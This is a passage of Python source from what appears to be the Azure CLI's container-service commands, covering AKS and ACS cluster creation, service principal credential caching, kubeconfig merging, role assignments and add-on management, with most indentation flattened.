:rtype: :class:`ClientRawResponse<msrest.pipeline.ClientRawResponse>`
if raw=true
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
if ssh_key_value is not None and not is_valid_ssh_rsa_public_key(ssh_key_value):
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(ssh_key_value))
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
    # if api-version is not specified, or the specified version is not supported,
    # override it based on location
if api_version is None or api_version not in ["2017-01-31", "2017-07-01"]:
if location in regions_in_preview:
api_version = "2017-07-01" # 2017-07-01 supported in the preview locations
else:
api_version = "2017-01-31" # 2017-01-31 applied to other locations
if orchestrator_type.lower() == 'kubernetes':
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx, service_principal, client_secret, subscription_id,
dns_name_prefix, location, name)
client_secret = principal_obj.get("client_secret")
service_principal = principal_obj.get("service_principal")
elif windows:
raise CLIError('--windows is only supported for Kubernetes clusters')
# set location if void
if not location:
location = '[resourceGroup().location]'
# set os_type
os_type = 'Linux'
if windows:
os_type = 'Windows'
# set agent_ports if void
if not agent_ports:
agent_ports = []
# get windows_profile
windows_profile = _generate_windows_profile(windows, admin_username, admin_password)
# The resources.properties fields should match with ContainerServices' api model
master_pool_profile = _generate_master_pool_profile(api_version, master_profile, master_count, dns_name_prefix,
master_vm_size, master_osdisk_size, master_vnet_subnet_id,
master_first_consecutive_static_ip, master_storage_profile)
agent_pool_profiles = _generate_agent_pool_profiles(api_version, agent_profiles, agent_count, dns_name_prefix,
agent_vm_size, os_type, agent_osdisk_size, agent_vnet_subnet_id,
agent_ports, agent_storage_profile)
outputs = _generate_outputs(name, orchestrator_type, admin_username)
properties = _generate_properties(api_version, orchestrator_type, orchestrator_version, master_pool_profile,
agent_pool_profiles, ssh_key_value, admin_username, windows_profile)
resource = {
"apiVersion": api_version,
"location": location,
"type": "Microsoft.ContainerService/containerServices",
"name": name,
"tags": tags,
"properties": properties,
}
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"resources": [
resource,
],
"outputs": outputs,
}
params = {}
if service_principal is not None and client_secret is not None:
properties["servicePrincipalProfile"] = {
"clientId": service_principal,
"secret": "[parameters('clientSecret')]",
}
template["parameters"] = {
"clientSecret": {
"type": "secureString",
"metadata": {
"description": "The client secret for the service principal"
}
}
}
params = {
"clientSecret": {
"value": client_secret
}
}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return _invoke_deployment(cmd.cli_ctx, resource_group_name, deployment_name,
template, params, validate, no_wait)
except CloudError as ex:
retry_exception = ex
if 'is not valid according to the validation procedure' in ex.message or \
'The credentials in ServicePrincipalProfile were invalid' in ex.message or \
'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def store_acs_service_principal(subscription_id, client_secret, service_principal,
file_name='acsServicePrincipal.json'):
obj = {}
if client_secret:
obj['client_secret'] = client_secret
if service_principal:
obj['service_principal'] = service_principal
config_path = os.path.join(get_config_dir(), file_name)
full_config = load_service_principals(config_path=config_path)
if not full_config:
full_config = {}
full_config[subscription_id] = obj
with os.fdopen(os.open(config_path, os.O_RDWR | os.O_CREAT | os.O_TRUNC, 0o600),
'w+') as spFile:
json.dump(full_config, spFile)
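# Illustrative note (not from the original source; the ids and secret below are made-up
# placeholders): the cache written above lives in the CLI config directory, typically
# ~/.azure/acsServicePrincipal.json, and is keyed by subscription id:
#
#     {
#         "00000000-0000-0000-0000-000000000000": {
#             "client_secret": "<generated secret>",
#             "service_principal": "11111111-1111-1111-1111-111111111111"
#         }
#     }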
def load_acs_service_principal(subscription_id, file_name='acsServicePrincipal.json'):
config_path = os.path.join(get_config_dir(), file_name)
config = load_service_principals(config_path)
if not config:
return None
return config.get(subscription_id)
def load_service_principals(config_path):
if not os.path.exists(config_path):
return None
fd = os.open(config_path, os.O_RDONLY)
try:
with os.fdopen(fd) as f:
return shell_safe_json_parse(f.read())
except: # pylint: disable=bare-except
return None
def _invoke_deployment(cli_ctx, resource_group_name, deployment_name, template, parameters, validate, no_wait,
subscription_id=None):
from azure.mgmt.resource.resources import ResourceManagementClient
from azure.mgmt.resource.resources.models import DeploymentProperties
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
smc = get_mgmt_service_client(cli_ctx, ResourceManagementClient, subscription_id=subscription_id).deployments
if validate:
logger.info('==== BEGIN TEMPLATE ====')
logger.info(json.dumps(template, indent=2))
logger.info('==== END TEMPLATE ====')
return smc.validate(resource_group_name, deployment_name, properties)
return sdk_no_wait(no_wait, smc.create_or_update, resource_group_name, deployment_name, properties)
def k8s_get_credentials(cmd, client, name, resource_group_name,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
ssh_key_file=None,
overwrite_existing=False):
"""Download and install kubectl credentials from the cluster master
:param name: The name of the cluster.
:type name: str
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param path: Where to install the kubectl config file
:type path: str
:param ssh_key_file: Path to an SSH key file to use
:type ssh_key_file: str
"""
acs_info = _get_acs_info(cmd.cli_ctx, name, resource_group_name)
_k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing)
def _k8s_get_credentials_internal(name, acs_info, path, ssh_key_file, overwrite_existing):
if ssh_key_file is not None and not os.path.isfile(ssh_key_file):
raise CLIError('Private key file {} does not exist'.format(ssh_key_file))
dns_prefix = acs_info.master_profile.dns_prefix # pylint: disable=no-member
location = acs_info.location # pylint: disable=no-member
user = acs_info.linux_profile.admin_username # pylint: disable=no-member
_mkdir_p(os.path.dirname(path))
path_candidate = path
ix = 0
while os.path.exists(path_candidate):
ix += 1
path_candidate = '{}-{}-{}'.format(path, name, ix)
# TODO: this only works for public cloud, need other casing for national clouds
acs_client.secure_copy(user, '{}.{}.cloudapp.azure.com'.format(dns_prefix, location),
'.kube/config', path_candidate, key_filename=ssh_key_file)
# merge things
if path_candidate != path:
try:
merge_kubernetes_configurations(path, path_candidate, overwrite_existing)
except yaml.YAMLError as exc:
logger.warning('Failed to merge credentials to kube config file: %s', exc)
logger.warning('The credentials have been saved to %s', path_candidate)
def _handle_merge(existing, addition, key, replace):
if addition[key]:
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
raise CLIError('A different object named {} already exists in {}'.format(i['name'], key))
existing[key].append(i)
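# A small worked example (hypothetical entries, not from the original source) of how
# _handle_merge treats the 'clusters' key: a same-named but different entry replaces the
# existing one when replace=True (otherwise a CLIError is raised), and entries with new
# names are appended.
#
#     existing = {'clusters': [{'name': 'aks1', 'cluster': {'server': 'https://a'}}]}
#     addition = {'clusters': [{'name': 'aks1', 'cluster': {'server': 'https://b'}},
#                              {'name': 'aks2', 'cluster': {'server': 'https://c'}}]}
#     _handle_merge(existing, addition, 'clusters', replace=True)
#     # existing['clusters'] now holds the 'aks1' entry from addition plus the new 'aks2' entry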
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
else:
raise
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace):
    existing = load_kubernetes_configuration(existing_file)
    addition = load_kubernetes_configuration(addition_file)
    if addition is None:
        raise CLIError('failed to load additional configuration from {}'.format(addition_file))
    # rename the admin context so it doesn't overwrite the user context
    for ctx in addition.get('contexts', []):
        try:
            if ctx['context']['user'].startswith('clusterAdmin'):
                admin_name = ctx['name'] + '-admin'
                addition['current-context'] = ctx['name'] = admin_name
                break
        except (KeyError, TypeError):
            continue
    if existing is None:
        existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(current_context, existing_file)
print(msg)
def _get_host_name(acs_info):
"""
Gets the FQDN from the acs_info object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info is None:
raise CLIError('Missing acs_info')
if acs_info.master_profile is None:
raise CLIError('Missing master_profile')
if acs_info.master_profile.fqdn is None:
raise CLIError('Missing fqdn')
return acs_info.master_profile.fqdn
def _get_username(acs_info):
"""
Gets the admin user name from the Linux profile of the ContainerService object.
:param acs_info: ContainerService object from Azure REST API
:type acs_info: ContainerService
"""
if acs_info.linux_profile is not None:
return acs_info.linux_profile.admin_username
return None
def _get_acs_info(cli_ctx, name, resource_group_name):
"""
Gets the ContainerService object from Azure REST API.
:param name: ACS resource name
:type name: String
:param resource_group_name: Resource group name
:type resource_group_name: String
"""
container_services = cf_container_services(cli_ctx, None)
return container_services.get(resource_group_name, name)
def _rand_str(n):
"""
Gets a random string
"""
choices = string.ascii_lowercase + string.digits
return ''.join(random.SystemRandom().choice(choices) for _ in range(n))
def _mkdir_p(path):
# http://stackoverflow.com/a/600612
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def update_acs(cmd, client, resource_group_name, container_service_name, new_agent_count):
instance = client.get(resource_group_name, container_service_name)
instance.agent_pool_profiles[0].count = new_agent_count # pylint: disable=no-member
# null out the service principal because otherwise validation complains
if instance.orchestrator_profile.orchestrator_type == ContainerServiceOrchestratorTypes.kubernetes:
instance.service_principal_profile = None
# null out the windows profile so that validation doesn't complain about not having the admin password
instance.windows_profile = None
return client.create_or_update(resource_group_name, container_service_name, instance)
def list_container_services(cmd, client, resource_group_name=None):
''' List Container Services. '''
svc_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(svc_list)
def show_service_principal(client, identifier):
object_id = _resolve_service_principal(client, identifier)
return client.get(object_id)
def _resolve_service_principal(client, identifier):
# todo: confirm with graph team that a service principal name must be unique
result = list(client.list(filter="servicePrincipalNames/any(c:c eq '{}')".format(identifier)))
if result:
return result[0].object_id
try:
uuid.UUID(identifier)
return identifier # assume an object id
except ValueError:
raise CLIError("service principal '{}' doesn't exist".format(identifier))
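# Illustrative usage (made-up identifiers): the identifier may be a service principal name
# or an object id GUID.
#
#     _resolve_service_principal(client, 'http://my-aks-sp')
#     # -> object id found via the servicePrincipalNames filter
#     _resolve_service_principal(client, '00000000-0000-0000-0000-000000000000')
#     # -> returned as-is when no SPN matches, since it parses as a UUID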
def create_application(client, display_name, homepage, identifier_uris,
available_to_other_tenants=False, password=None, reply_urls=None,
key_value=None, key_type=None, key_usage=None, start_date=None,
end_date=None):
from azure.graphrbac.models import GraphErrorException
password_creds, key_creds = _build_application_creds(password, key_value, key_type,
key_usage, start_date, end_date)
app_create_param = ApplicationCreateParameters(available_to_other_tenants=available_to_other_tenants,
display_name=display_name,
identifier_uris=identifier_uris,
homepage=homepage,
reply_urls=reply_urls,
key_credentials=key_creds,
password_credentials=password_creds)
try:
return client.create(app_create_param)
except GraphErrorException as ex:
if 'insufficient privileges' in str(ex).lower():
link = 'https://docs.microsoft.com/en-us/azure/azure-resource-manager/resource-group-create-service-principal-portal' # pylint: disable=line-too-long
raise CLIError("Directory permission is needed for the current user to register the application. "
"For how to configure, please refer '{}'. Original error: {}".format(link, ex))
raise
def _build_application_creds(password=None, key_value=None, key_type=None,
key_usage=None, start_date=None, end_date=None):
if password and key_value:
raise CLIError('specify either --password or --key-value, but not both.')
if not start_date:
start_date = datetime.datetime.utcnow()
elif isinstance(start_date, str):
start_date = dateutil.parser.parse(start_date)
if not end_date:
end_date = start_date + relativedelta(years=1)
elif isinstance(end_date, str):
end_date = dateutil.parser.parse(end_date)
key_type = key_type or 'AsymmetricX509Cert'
key_usage = key_usage or 'Verify'
password_creds = None
key_creds = None
if password:
password_creds = [PasswordCredential(start_date=start_date, end_date=end_date,
key_id=str(uuid.uuid4()), value=password)]
elif key_value:
key_creds = [KeyCredential(start_date=start_date, end_date=end_date, value=key_value,
key_id=str(uuid.uuid4()), usage=key_usage, type=key_type)]
return (password_creds, key_creds)
def create_service_principal(cli_ctx, identifier, resolve_app=True, rbac_client=None):
if rbac_client is None:
rbac_client = get_graph_rbac_management_client(cli_ctx)
if resolve_app:
try:
uuid.UUID(identifier)
result = list(rbac_client.applications.list(filter="appId eq '{}'".format(identifier)))
except ValueError:
result = list(rbac_client.applications.list(
filter="identifierUris/any(s:s eq '{}')".format(identifier)))
if not result: # assume we get an object id
result = [rbac_client.applications.get(identifier)]
app_id = result[0].app_id
else:
app_id = identifier
return rbac_client.service_principals.create(ServicePrincipalCreateParameters(app_id=app_id, account_enabled=True))
def create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None):
return _create_role_assignment(cli_ctx, role, assignee, resource_group_name, scope)
def _create_role_assignment(cli_ctx, role, assignee, resource_group_name=None, scope=None, resolve_assignee=True):
from azure.cli.core.profiles import ResourceType, get_sdk
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
definitions_client = factory.role_definitions
scope = _build_role_scope(resource_group_name, scope, assignments_client.config.subscription_id)
role_id = _resolve_role_id(role, scope, definitions_client)
object_id = _resolve_object_id(cli_ctx, assignee) if resolve_assignee else assignee
RoleAssignmentCreateParameters = get_sdk(cli_ctx, ResourceType.MGMT_AUTHORIZATION,
'RoleAssignmentCreateParameters', mod='models',
operation_group='role_assignments')
parameters = RoleAssignmentCreateParameters(role_definition_id=role_id, principal_id=object_id)
assignment_name = uuid.uuid4()
custom_headers = None
return assignments_client.create(scope, assignment_name, parameters, custom_headers=custom_headers)
def _build_role_scope(resource_group_name, scope, subscription_id):
subscription_scope = '/subscriptions/' + subscription_id
if scope:
if resource_group_name:
err = 'Resource group "{}" is redundant because scope is supplied'
raise CLIError(err.format(resource_group_name))
elif resource_group_name:
scope = subscription_scope + '/resourceGroups/' + resource_group_name
else:
scope = subscription_scope
return scope
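# Worked example (made-up ids) of the scope strings _build_role_scope produces:
#
#     _build_role_scope('myRG', None, 'sub-0000')
#     # -> '/subscriptions/sub-0000/resourceGroups/myRG'
#     _build_role_scope(None, None, 'sub-0000')
#     # -> '/subscriptions/sub-0000'
#     _build_role_scope(None, '/subscriptions/sub-0000/resourceGroups/net/providers/'
#                             'Microsoft.Network/virtualNetworks/vnet1/subnets/s1', 'sub-0000')
#     # -> the explicit scope is returned unchanged (supplying a resource group as well raises CLIError)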
def _resolve_role_id(role, scope, definitions_client):
role_id = None
try:
uuid.UUID(role)
role_id = role
except ValueError:
pass
if not role_id: # retrieve role id
role_defs = list(definitions_client.list(scope, "roleName eq '{}'".format(role)))
if not role_defs:
raise CLIError("Role '{}' doesn't exist.".format(role))
elif len(role_defs) > 1:
ids = [r.id for r in role_defs]
err = "More than one role matches the given name '{}'. Please pick a value from '{}'"
raise CLIError(err.format(role, ids))
role_id = role_defs[0].id
return role_id
def _resolve_object_id(cli_ctx, assignee):
client = get_graph_rbac_management_client(cli_ctx)
result = None
if assignee.find('@') >= 0: # looks like a user principal name
result = list(client.users.list(filter="userPrincipalName eq '{}'".format(assignee)))
if not result:
result = list(client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(assignee)))
if not result: # assume an object id, let us verify it
result = _get_object_stubs(client, [assignee])
# 2+ matches should never happen, so we only check 'no match' here
if not result:
raise CLIError("No matches in graph database for '{}'".format(assignee))
return result[0].object_id
def _get_object_stubs(graph_client, assignees):
params = GetObjectsParameters(include_directory_object_references=True,
object_ids=assignees)
return list(graph_client.objects.get_objects_by_object_ids(params))
def _update_dict(dict1, dict2):
cp = dict1.copy()
cp.update(dict2)
return cp
def subnet_role_assignment_exists(cli_ctx, scope):
network_contributor_role_id = "4d97b98b-1d4f-4787-a291-c67834d212e7"
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope == scope and i.role_definition_id.endswith(network_contributor_role_id):
return True
return False
def aks_browse(cmd, client, resource_group_name, name, disable_browser=False, listen_port='8001',
enable_cloud_console_aks_browse=False):
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
if in_cloud_console() and not enable_cloud_console_aks_browse:
raise CLIError('Browse is disabled in cloud shell by default.')
proxy_url = 'http://127.0.0.1:{0}/'.format(listen_port)
_, browse_path = tempfile.mkstemp()
# TODO: need to add an --admin option?
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system", "--output", "name",
"--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console() and enable_cloud_console_aks_browse:
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/8001')
result = json.loads(response.text)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{}'.format(term_id),
json={"url": result['url']})
logger.warning('To view the console, please open %s in a new tab', result['url'])
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(proxy_url)
try:
subprocess.call(["kubectl", "--kubeconfig", browse_path, "--namespace", "kube-system",
"port-forward", dashboard_pod, "{0}:9090".format(listen_port)])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
# TODO: Better error handling here.
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_size=0,
node_count=3,
nodepool_name="nodepool1",
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
skip_subnet_role_assignment=False,
network_plugin=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
no_wait=False,
purge_sp_cache=False):
_validate_ssh_key(no_ssh_key, ssh_key_value)
subscription_id = _get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
max_pods=int(max_pods) if max_pods else None
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name, purge_sp_cache=purge_sp_cache)
service_principal_profile = ContainerServiceServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"),
key_vault_secret_ref=None)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_profile.client_id, scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
network_profile = None
if any([network_plugin, pod_cidr, service_cidr, dns_service_ip, docker_bridge_address]):
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id
)
if 'omsagent' in addon_profiles:
_ensure_container_insights_for_monitoring(cmd, addon_profiles['omsagent'])
aad_profile = None
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret, aad_tenant_id]):
if aad_tenant_id is None:
profile = Profile(cli_ctx=cmd.cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=False if disable_rbac else True,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
return sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=mc)
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = _get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
else:
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="nodepool1", no_wait=False):
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name:
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_upgrade(cmd, client, resource_group_name, name, kubernetes_version, no_wait=False, **kwargs): # pylint: disable=unused-argument
instance = client.get(resource_group_name, name)
instance.kubernetes_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces-preview'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces_preview.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None, prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
        using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an interactive selection experience.
:type space_name: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
    :param resource_group_name: Name of resource group. You can configure the default group \
        using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
# for each addons argument
for addon_arg in addon_args:
addon = ADDONS[addon_arg]
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
                    raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
                                   'To change monitoring configuration, run "az aks disable-addons -a monitoring" '
                                   'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension import get_extension_path
ext_dir = get_extension_path(extension_name)
sys.path.append(ext_dir)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
